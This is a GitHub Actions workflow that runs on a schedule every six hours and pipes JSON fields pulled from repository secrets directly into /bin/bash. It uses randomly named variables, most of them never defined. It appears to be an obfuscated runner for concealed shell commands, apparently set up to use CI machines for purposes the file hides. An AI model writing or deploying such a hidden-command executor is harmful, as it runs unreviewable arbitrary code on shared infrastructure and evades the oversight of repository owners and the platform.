name: gummyflame

on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gummyflame
        env:
          es0: ${{ secrets.es0 }}
        run: |
          echo $es0 | jq -r .dkaf13897 | /bin/bash
          echo $ffso8 | jq -r .hicr91 | /bin/bash
          echo $r84868 | jq -r .mjo13 | /bin/bash
          echo $lxp5475 | jq -r .vqmai0870 | /bin/bash
          echo $vbdea325 | jq -r .xolc8212 | /bin/bash
          echo $tj37724 | jq -r .kfe433 | /bin/bash
          echo $iznwl2 | jq -r .t05529 | /bin/bash
          echo $s3609 | jq -r .hq2 | /bin/bash
          echo $oqht34714 | jq -r .yjxb57 | /bin/bash

